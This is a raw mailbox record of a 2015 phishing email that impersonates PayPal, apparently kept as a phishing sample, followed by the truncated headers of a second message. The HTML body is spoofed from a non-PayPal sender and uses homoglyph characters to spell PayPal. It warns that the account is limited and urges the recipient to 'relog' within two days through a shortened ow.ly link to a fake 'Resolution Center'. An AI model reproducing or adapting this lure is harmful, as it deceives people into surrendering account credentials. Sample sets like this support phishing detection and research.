From: "=?utf-8?Q?Paypal=20Inc=2E?=" <cs@sevr.com>
To: "jose@monkey.org" <jose@monkey.org>
Date: Fri, 16 Oct 2015 00:59:50 +0700
Subject: =?utf-8?Q?We=27ve=20limit=20your=20account=20access?=
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_=aspNetEmail=_5e7271fbed7a4074913a300c51489cb6"
Message-ID: <IRFANPC7363005988d748c0a0649a8423ce2113@IrfanPC>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 202

--_=aspNetEmail=_5e7271fbed7a4074913a300c51489cb6
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4=2E0 Transitional//EN=22>=0D=
=0A<HTML><HEAD></HEAD>=0D=0A<BODY>=0D=0A<TABLE =0D=0Astyle=3D=22FONT-SIZE=
: 14px; FONT-FAMILY: arial, sans-serif; COLOR: rgb(34,34,34); LINE-HEIGHT=
: 20px; BACKGROUND-COLOR: rgb(253,253,253)=22 =0D=0AcellSpacing=3D0 cellP=
adding=3D0 width=3D640>=0D=0A  <TBODY>=0D=0A  <TR>=0D=0A    <TD =0D=0A   =
 style=3D=22PADDING-BOTTOM: 20px; TEXT-ALIGN: center; PADDING-TOP: 20px; =
PADDING-LEFT: 20px; MARGIN: 0px; PADDING-RIGHT: 20px=22><SPAN =0D=0A     =
 style=3D=22FONT-FAMILY: tahoma,geneva,sans-serif=22><SPAN =0D=0A      st=
yle=3D=22FONT-SIZE: 38px; FONT-WEIGHT: bold; COLOR: rgb(0,51,102); FONT-S=
TYLE: italic; BACKGROUND-COLOR: rgb(255,255,255)=22>Pay</SPAN><SPAN =0D=0A=
      style=3D=22FONT-SIZE: 38px; FONT-WEIGHT: bold; COLOR: rgb(0,156,222=
); FONT-STYLE: italic; BACKGROUND-COLOR: rgb(255,255,255)=22>Pal</SPAN></=
SPAN></TD></TR>=0D=0A  <TR>=0D=0A    <TD style=3D=22MARGIN: 0px=22>=0D=0A=
      <TABLE =0D=0A      style=3D=22BORDER-TOP: rgb(237,237,237) 1px soli=
d; BORDER-RIGHT: rgb(237,237,237) 1px solid; BORDER-COLLAPSE: collapse; B=
ORDER-BOTTOM: rgb(237,237,237) 1px solid; BORDER-LEFT: rgb(237,237,237) 1=
px solid; BACKGROUND-COLOR: rgb(255,255,255)=22 =0D=0A      cellSpacing=3D=
0 cellPadding=3D0 width=3D=22100=25=22 border=3D0>=0D=0A        <TBODY>=0D=
=0A        <TR>=0D=0A          <TD style=3D=22MARGIN: 0px=22>=0D=0A      =
      <TABLE style=3D=22BORDER-COLLAPSE: collapse=22 cellSpacing=3D0 cell=
Padding=3D0 =0D=0A            width=3D=22100=25=22 align=3Dcenter border=3D=
0>=0D=0A              <TBODY>=0D=0A              <TR>=0D=0A              =
  <TD =0D=0A                style=3D=22PADDING-BOTTOM: 30px; PADDING-TOP:=
 55px; PADDING-LEFT: 10px; MARGIN: 0px; PADDING-RIGHT: 10px=22 =0D=0A    =
            align=3Dcenter>=0D=0A                  <H2 =0D=0A            =
      style=3D=22FONT-SIZE: 23px; FONT-WEIGHT: 400; COLOR: rgb(46,54,69);=
 TEXT-ALIGN: center; MARGIN: 0px=22><SPAN =0D=0A                  style=3D=
=22FONT-SIZE: 42px; FONT-FAMILY: HelveticaNeueLight, =27Helvetica Neue Li=
ght=27, Arial, sans-serif; COLOR: rgb(0,156,222); BACKGROUND-COLOR: rgb(2=
55,255,255)=22>Update =0D=0A                  Your Account</SPAN></H2></T=
D></TR>=0D=0A              <TR>=0D=0A                <TD style=3D=22PADDI=
NG-BOTTOM: 30px; MARGIN: 0px=22 align=3Dcenter>=0D=0A                  <P=
 =0D=0A                  style=3D=22FONT-SIZE: 11px; FONT-FAMILY: Verdana=
, Arial, Helvetica, sans-serif; COLOR: rgb(51,51,51)=22>Hello =0D=0A     =
             Dear jose=40monkey=2Eorg,</P>=0D=0A                  <P =0D=0A=
                  style=3D=22FONT-SIZE: 11px; FONT-FAMILY: Verdana, Arial=
, Helvetica, sans-serif; COLOR: rgb(51,51,51)=22>To =0D=0A               =
   get back into your =26=23929;ay=26=23929;al=26nbsp;account, you=27ll n=
eed to relog =0D=0A                  in your account=2E</P>=0D=0A        =
          <TABLE class=3Dyiv1853218147howTo =0D=0A                  style=
=3D=22FONT-SIZE: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif=
; font-stretch: normal=22 =0D=0A                  cellSpacing=3D0 cellPad=
ding=3D10 width=3D=22100=25=22 border=3D0>=0D=0A                    <TBOD=
Y>=0D=0A                    <TR>=0D=0A                      <TD style=3D=22=
BACKGROUND-COLOR: rgb(255,255,255)=22>=0D=0A                        <P>It=
=27s easy:</P>=0D=0A                        <OL>=0D=0A                   =
       <LI>Click the link below to open a secure browser =0D=0A          =
                window=2E =0D=0A                          <LI>You have 2 =
days from the date of your =26=23929;ay=26=23929;al =0D=0A               =
           restrictions to fully restore your account access =0D=0A      =
                    through the <A =0D=0A                          style=3D=
=22TEXT-DECORATION: none; FONT-WEIGHT: bold; COLOR: =23333333=22 =0D=0A  =
                        href=3D=22http://ow=2Ely/TrMIW=22 rel=3Dnofollow =
=0D=0A                          target=3D_blank>Resolution Center</A>=2E =
If we don=27t =0D=0A                          receive the information bef=
ore this deadline, your =0D=0A                          account access ma=
y be further limited=2E =0D=0A                    </LI></OL></TD></TR></T=
BODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>=0D=0A        <TR>=0D=0A=
          <TD =0D=0A          style=3D=22BORDER-BOTTOM: rgb(237,237,237) =
1px solid; PADDING-BOTTOM: 40px; MARGIN: 0px=22>=0D=0A            <TABLE =
style=3D=22HEIGHT: 45px; TABLE-LAYOUT: fixed; MARGIN: 0px auto=22 =0D=0A =
           cellSpacing=3D0 cellPadding=3D0 width=3D280 align=3Dcenter bor=
der=3D0>=0D=0A              <DIV =0D=0A              style=3D=22COLOR: =23=
757575; PADDING-LEFT: 200px; PADDING-RIGHT: 200px=22>=0D=0A              =
<P id=3Dbutton_text class=3Dbutton_style =0D=0A              style=3D=22F=
ONT-SIZE: 13px; FONT-FAMILY: Arial,sans-serif; BACKGROUND: =23009cde; FON=
T-WEIGHT: bold; COLOR: =23fff; TEXT-ALIGN: center; font-stretch: normal; =
border-radius: 7px; -webkit-border-radius: 7px; -moz-border-radius: 7px; =
-o-border-radius: 7px; -ms-border-radius: 7px=22 =0D=0A              alig=
n=3Dcenter><A =0D=0A              style=3D=22TEXT-DECORATION: none; FONT-=
WEIGHT: bold; COLOR: =23fff; DISPLAY: block=22 =0D=0A              href=3D=
=22http://ow=2Ely/TrMIW=22><SPAN =0D=0A              style=3D=22FONT-SIZE=
: 15px; TEXT-DECORATION: none; FONT-FAMILY: Arial,sans-serif; FONT-WEIGHT=
: bold; COLOR: =23fff; DISPLAY: block; LINE-HEIGHT: 40px =21important=22>=
Update=26nbsp;Your=26nbsp;Account</SPAN></A></P></DIV>=0D=0A             =
 <TBODY></TBODY></TABLE><BR></TD></TR></TBODY></TABLE></TD></TR>=0D=0A  <=
TR>=0D=0A    <TD style=3D=22PADDING-BOTTOM: 50px; PADDING-TOP: 20px; MARG=
IN: 0px=22>=0D=0A      <TABLE =0D=0A      style=3D=22BORDER-TOP: rgb(225,=
225,225) 1px dotted; BORDER-COLLAPSE: collapse; COLOR: rgb(165,165,165)=22=
 =0D=0A      cellSpacing=3D0 cellPadding=3D0 width=3D=22100=25=22 border=3D=
0>=0D=0A        <TBODY>=0D=0A        <TR>=0D=0A          <TD =0D=0A      =
    style=3D=22PADDING-BOTTOM: 30px; TEXT-ALIGN: center; PADDING-TOP: 10p=
x; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px=22>PayPal =0D=0A   =
         inc=2E</TD></TR>=0D=0A        <TR>=0D=0A          <TD style=3D=22=
TEXT-ALIGN: center; MARGIN: 0px=22>=26=23169; <SPAN =0D=0A            sty=
le=3D=22FONT-SIZE: 11px=22><STRONG><SPAN =0D=0A            style=3D=22FON=
T-FAMILY: arial, sans-serif; COLOR: rgb(51,51,51); BACKGROUND-COLOR: rgb(=
255,255,255)=22>Copyright =0D=0A            =26=23169; 1999-2015=26nbsp;<=
/SPAN><SPAN class=3Dil =0D=0A            style=3D=22FONT-FAMILY: arial, s=
ans-serif; COLOR: rgb(51,51,51); BACKGROUND-COLOR: rgb(255,255,255)=22>Pa=
yPal</SPAN><SPAN =0D=0A            style=3D=22FONT-FAMILY: arial, sans-se=
rif; COLOR: rgb(51,51,51); BACKGROUND-COLOR: rgb(255,255,255)=22>, =0D=0A=
            Inc=2E All rights reserved=2E</SPAN></STRONG></SPAN></TD></TR=
>=0D=0A        <TR>=0D=0A          <TD style=3D=22PADDING-TOP: 10px; MARG=
IN: 0px=22 align=3Dcenter>=0D=0A            <TABLE cellSpacing=3D0 cellPa=
dding=3D0 width=3D300 border=3D0>=0D=0A              <TBODY>=0D=0A       =
       <TR>=0D=0A                <TD style=3D=22TEXT-ALIGN: center; MARGI=
N: 0px=22 width=3D55><A =0D=0A                  style=3D=22TEXT-DECORATIO=
N: none; COLOR: rgb(165,165,165)=22 =0D=0A                  href=3D=22htt=
ps://github=2Ecom/paypal=22 target=3D_blank>Github</A></TD>=0D=0A        =
        <TD style=3D=22TEXT-ALIGN: center; MARGIN: 0px=22 width=3D55><A =0D=
=0A                  style=3D=22TEXT-DECORATION: none; COLOR: rgb(165,165=
,165)=22 =0D=0A                  href=3D=22https://twitter=2Ecom/paypal=22=
 target=3D_blank>Twitter</A></TD>=0D=0A                <TD style=3D=22TEX=
T-ALIGN: center; MARGIN: 0px=22 width=3D68><A =0D=0A                  sty=
le=3D=22TEXT-DECORATION: none; COLOR: rgb(165,165,165)=22 =0D=0A         =
         href=3D=22https://www=2Efacebook=2Ecom/PayPalYalla?brand_redir=3D=
589464587749730=22 =0D=0A                  target=3D_blank>Facebook</A></=
TD>=0D=0A                <TD style=3D=22TEXT-ALIGN: center; MARGIN: 0px=22=
 width=3D67><A =0D=0A                  style=3D=22TEXT-DECORATION: none; =
COLOR: rgb(165,165,165)=22 =0D=0A                  href=3D=22https://www=2E=
linkedin=2Ecom/company/paypal=22 =0D=0A                  target=3D_blank>=
LinkedIn</A></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>=0D=0A   =
   <P style=3D=22TEXT-ALIGN: center=22>=26nbsp;</P></TD></TR></TBODY></TA=
BLE>=0D=0A<P>=26nbsp;</P></BODY></HTML>=0D=0A

--_=aspNetEmail=_5e7271fbed7a4074913a300c51489cb6--

From apache@251882-web1.netshiftmedia.com  Thu Oct 15 23:37:15 2015
Return-Path: <apache@251882-web1.netshiftmedia.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 369A6F4169
	for <jose@login.monkey.org>; Thu, 15 Oct 2015 23:37:15 -0500 (CDT)
Received: from smtpin16.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay02.b.hostedemail.com (Postfix) with SMTP id E216F27AB6F
	for <jose@login.monkey.org>; Fri, 16 Oct 2015 04:37:14 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70746711588.16.crown50_2221f6fbb7b02
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 85,1,0,7424f6d4222b4f3e,d41d8cd98f00b204,apache@251882-web1.netshiftmedia.com,:,RULES_HIT:41:327:355:379:543:871:988:989:1000:1216:1260:1313:1314:1345:1381:1516:1517:1525:1536:1569:1575:1699:1711:1714:1730:1747:1764:1777:1792:2393:2559:2562:2909:3138:3139:3140:3141:3142:3876:3877:4321:5007:6114:6261:6264:6491:6506:6642:6747:6748:7219:7281:7398:10004:10234:10400:11604:11658:11914:12196:12340:12438:12555:12698:12737:13302:21080:21212,0,RBL:204.232.183.58-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0
X-HE-Tag: crown50_2221f6fbb7b02
X-Filterd-Recvd-Size: 43574
Received: from 251882-web1.netshiftmedia.com (251882-web1.netshiftmedia.com [204.232.183.58])
	by imf22.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 16 Oct 2015 04:37:14 +0000 (UTC)
Received: by 251882-web1.netshiftmedia.com (Postfix, from userid 48)
	id 4679AB6E93D; Thu, 15 Oct 2015 21:27:07 -0700 (PDT)
Date: Thu, 15 Oct 2015 21:27:07 -0700
To: jose@monkey.org
